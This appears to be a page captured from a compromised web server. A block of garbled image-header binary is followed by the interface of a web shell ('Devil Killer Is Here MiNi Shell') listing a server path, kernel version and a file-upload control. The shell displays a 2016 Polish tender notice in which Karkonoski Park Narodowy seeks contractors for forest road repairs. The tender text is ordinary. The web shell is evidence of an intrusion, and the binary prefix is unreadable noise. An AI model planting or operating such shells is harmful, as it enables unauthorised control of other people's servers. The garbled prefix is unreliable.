JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303543-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 303543 - 2016
              z dnia 2016-08-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jelenia Góra: Remont dróg leśnych w Obwodach Ochronnych Śnieżka, Przełęcz i Szrenica

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Karkonoski Park Narodowy z siedzibą w Jeleniej Górze, krajowy numer identyfikacyjny
              2178131400000, ul.
              ul. Chałubińskiego 
              23,
              58570  
              Jelenia Góra, woj.
              dolnośląskie, państwo
              , tel.
              757 553 726, e-mail
              , faks
              757 553 348.
              <br />
              Adres strony internetowej (URL): www.kpnmab.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.bip.kpnmab.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka sektora finansów publicznych </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.kpnmab.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.kpnmab.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie- Karkonoski Park Narodowy z siedzibą w Jeleniej Górze ul. Chałubińskiego 23; 58-570 Jelenia Góra <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont dróg leśnych w Obwodach Ochronnych Śnieżka, Przełęcz i Szrenica

<br /><b>Numer referencyjny: </b>KPN/18/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Remont dróg leśnych w Obwodach Ochronnych Śnieżka, Przełęcz i SzrenicaObwód Ochronny Śnieżka	PAKIET NR 1

nr poz.	lokalizacja	zadanie 	zakres
1	Oddz. 32a	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
		wzmocnienie korony drogi obrzeżem z kamienia łupanego	112m
		wbudowanie w nawierzchnię wodopustów z kostki kamiennej 	35m2
		remont cząstkowy nawierzchni drogi 	320m2
2	Oddz.34i,g, 35ab, 36a,b,c,d	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	4m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	16m2
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	17m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	60m2
		wymiana na nowe wodospustów z obrzynanych bali drewnianych	168m
		wzmocnienie wodospustów brukowaniem z kamienia łamanego 	70m2
		odtworzenie rowów przy drogach leśnych 	112m3
3	Oddz.34i,	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	15m
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	80m2
4	Oddz. 45a,b,c,g,h, 44h, 51a,f,l,g, 50a,b,c,d, 38n,j,d,c,a, 48c,b,d,f, 49a,b,c,d 	wykonanie wospustów z profili betonowych wraz z uzupełnieniem nawierzchni tłuczniowej 	200m2
5	Oddz. 56d,64d,f,h, 63g, 71c,gh 	przebrukowanie nawierzchni z kostki kamiennej wraz z uformowaniem pobocza 	125,71m2
		Wymiana istniejącego przepustu na nowy PP 500 wraz ze ze ściankami czołową, wylotową w formie murku oporowego oraz formowaniem rowów na wlocie i wylocie przepustu	6m
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		wymiana przepustu na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	5m
		przebrukowanie nawierzchni z kostki kamiennej wraz z uformowaniem progów poprzecznych 15szt. 	705m2
		przebrukowanie nawierzchni poboczy z kamienia miejscowego	315m2
		oczyszczenie rowu /ścieku kamiennego z roślinności, namułu 	259m2
Obwód Ochronny Przełęcz	PAKIET NR II

6	Oddz. 123, 136	naprawa nawierzchni brukowanej z kamienia narzutowego, wraz z odtworzeniem kamieni oporowych i wodospustów kamiennych	416m2
		wykonanie nowego przepustu PP 400 wraz ze ściankami czołową, wylotową i odstojnikiem	11m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	44m2
		wykonanie przepustów kamiennych odkrytych w nawierzchni drogi z brukowaniem	38m2
7	Oddz. 113a,b	Remont kładki o nawierzchni drewnianej nad Wrzosówką, wraz z przyczółkami i konstrukcją nośną	40,5m2
		Wykonanie płyt najazdowych z brukowaniem z kostki kamiennej 	14m2
8	Oddz. 113a,b	odtworzenie rowów przy drogach leśnych wraz z umocnieniem korony drogi kamieniem	98m3
		wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	12m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	40m2
		wykonanie wodospustów z kostki kamiennej 	33,75 m2
		cząstkowy remont nawierzchni tłuczniowej 	223,5 m2
9	Oddz. 116b	Wzmocnienie przyczółków mostu - betonowanie ław fundamentowych	8,14 m3
		uzupełnianie i spoinowanie murów kamiennych	23,83 m2
10	Oddz. 131f, 143b - II Droga 	Wzmocnienie przyczółków mostu - betonowanie ław fundamentowych	5,09m3
		uzupełnianie i spoinowanie murów kamiennych	11,2m2
11	Oddz. 118i	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
12	oddz. 104/114	wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	175m2
13	oddz. 118d I droga/"Nowa Droga"	Poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	6m3
		odtworzenie rowu wraz z umocnieniem korony drogi rodzimymi kamieniami	30m3
		wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	10m 2
		cząstkowy remont nawierzchni drogi	120m2
14	oddz. 115a/b I droga	wykonanie murów oporowych z kamienia łupanego z oporem z betonu na ławie fundamentowej	50,4m3
		naprawa i uzupełnianie nawierzchni drogi 	135m2
15	Oddz. 122h/m, 135b Droga Modrzewiowa	wymiana przepustu kamiennego na rurowy pp śr 400 ze ściankami czołową, wylotową i odstojnikiem	9,5m
		wykonanie nowego przepustu PP 400 wraz ze z ściankami czołową, wylotową i odstojnikiem	4,5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	67,5m2
		poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	22m3
		odtworzenie rowu wraz z usunięciem dużych głazów i kamieni zalegających w rowie	145m3
16	Oddz. 135b/f Droga Stroma	poszerzanie korony drogi poprzez likwidację skarp wraz z wywiezieniem urobku we wskazane miejsce	60m3
17	Oddz. 145 II Droga 	cząstkowy remont nawierzchni drogi	360m2
18	Oddz. 115c, 122c/d Droga Pod Reglami 	remont nawierzchni tłuczniowej drogi 	465m2
		wykonanie wodospustów betonowych wraz z uzupełnieniem nawierzchni tłuczniowej	22,5m2
19	oddz. 114/115	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	20m2
Obwód Ochronny Szrenica	PAKIET NR III

20	Oddz. 179 a,b,c, 178 a,b 	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	24m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	96m2
21	Oddz. 184b	wykonanie nowego przepustu PP 500 wraz ze ze ściankami czołową, wylotową i odstojnikiem	6m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	24m2
22	Oddz. 214 f,g	wykonanie nowego przepustu PP 400 wraz ze ze ściankami czołową, wylotową i odstojnikiem	5m
		cząstkowy remont nawierzchni w obrębie przepustu wraz z uformowaniem rowów, wlotowy i wylotowy z przepustu	24m2
		Wykonanie wodospustu powierzchniowego z kostki kamiennej 	15,75m2
		odtworzenie rowu wraz z usunięciem dużych głazów i kamieni zalegających w rowie	910m3
		remont muru oporowego z kamienia układanego na sucho, z betonowaniem ławy fundamentowej i spinowaniem murów 	241,6m3
		wykonanie nowego przepustu PP 500 wraz ze ściankami czołową i odstojnikiem	7,5m
		wykonanie nowego przepustu PP 400 wraz ze ściankami czołową i odstojnikiem	7,5m
		Odbudowa nawierzchni tłuczniowej 	280m2
<br /><br /><b>II.5) Główny kod CPV: </b>45233260-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Wykonawca spełni warunek   jeżeli wykaże, że  jest ubezpieczony od odpowiedzialności cywilnej w    zakresie prowadzonej działalności związanej z przedmiotem zamówienia   
      na kwotę  co najmniej  pakiet nr 1  300.000,00 zł brutto
      pakiet nr 2  400000,00 brutto
                        pakiet nr 3  250.000,00 brutto
W przypadku składania oferty na więcej niż jedną część (pakiet) do oceny spełnienia warunku Wykonawca może wykazać się 1 polisą , której wartość równa się lub przewyższa wymaganą sumaryczną wartość dla każdego z pakietów, na które wykonawca składa ofertę
<br />
                Informacje dodatkowe
                ocena warunku na podstawie złożonego dokumnetu<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                                 a) wykonali co najmniej 1 robotę budowlaną w okresie ostatnich pięciu lat         (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie), odpowiadającą swoim rodzajem pracom stanowiącym przedmiot zamówienia (tj. za podobne roboty uważa się, remonty i naprawy górskich szlaków, dróg pieszych o nawierzchni utwardzonej, prace w zakresie brukowania szlaków górskich, wykonywanie infrastruktury technicznej tj. przepustów, rowów, progów, stopni i barier terenowych w warunkach górskich, zabudowa kamienna koryt potoków, rzek) o wartości co najmniej 300.000,00 zł brutto  (pakiet I), 400.000,00 zł brutto (pakiet II),250.000,00 zł brutto (pakiet III) .Za prace w warunkach górskich uważa się te, które zostały wykonane na szlakach turystycznych, ścieżkach pieszych położonych na terenach górskich (leśnych, nieleśnych) z wyłączeniem górskich terenów zurbanizowanych.   W przypadku składania oferty na więcej niż jedną część (pakiet) do oceny spełnienia warunku Wykonawca może wykazać się 1 robotą, której wartość równa się lub przewyższa wymaganą sumaryczną wartość robót dla każdego z pakietów, na które wykonawca składa ofertę lub przedstawić po 1 robocie dla każdego z pakietów, przy czym przedstawione przez Wykonawcę roboty nie mogą się powtarzać w innych częściach. (dla zamówień o wartości określonej w innych walutach przeliczenie na PLN będzie następowało według średniego kursu NBP z dnia ogłoszenia) i posiada dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.
     b) dysponują  odpowiednio 
 pakiet I: ze względu na specyficzny charakter terenu wymagany jest sprzęt do transportu materiałów i prowadzenia prac w górach  tj. koparko ładowarka, samochód ciężarowy dwuosiowy, płyta wibracyjna(zagęszczarka) o masie powyżej 500 kg lub walec samojezdny
pakiet II: ze względu na specyficzny charakter terenu wymagany jest sprzęt do transportu materiałów i prowadzenia prac w górach  tj. koparko ładowarka, samochód ciężarowy dwuosiowy, płyta wibracyjna(zagęszczarka) o masie powyżej 500 kg lub walec samojezdny
pakiet III: ze względu na specyficzny charakter terenu wymagany jest sprzęt do transportu materiałów i prowadzenia prac w górach  tj. koparko ładowarka  samochód ciężarowy dwuosiowy, płyta wibracyjna(zagęszczarka) o masie powyżej 500 kg lub walec samojezdny,  wibrator do betonu oraz koparkę na gąsienicach lub kółkach o pojemności łyżki 0,6 m3. 
c)	dysponuje osobą skierowaną przez Wykonawcę do realizacji zamówienia na stanowisku kierownika budowy, z uprawnieniami konstrukcyjno-budowlanymi lub drogowymi lub melioracyjnymi lub hydrotechnicznymi. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                ocena warunku na podstawie złożonego dokumnetu</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw  wykluczenia na podstawie o art. 24 ust. 5 pkt 1  pzp. 

b)	Jeżeli Państwo, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy nie wydaje się dokumentów, o których mowa w pkt. 3 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub oświadczenie osoby której dokument miał dotyczyć złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.

c) oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumenty potwierdzające dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności,
d)  oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne,
e)  oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy,
f)  oświadczenie wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy, 
g) oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716),
h) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
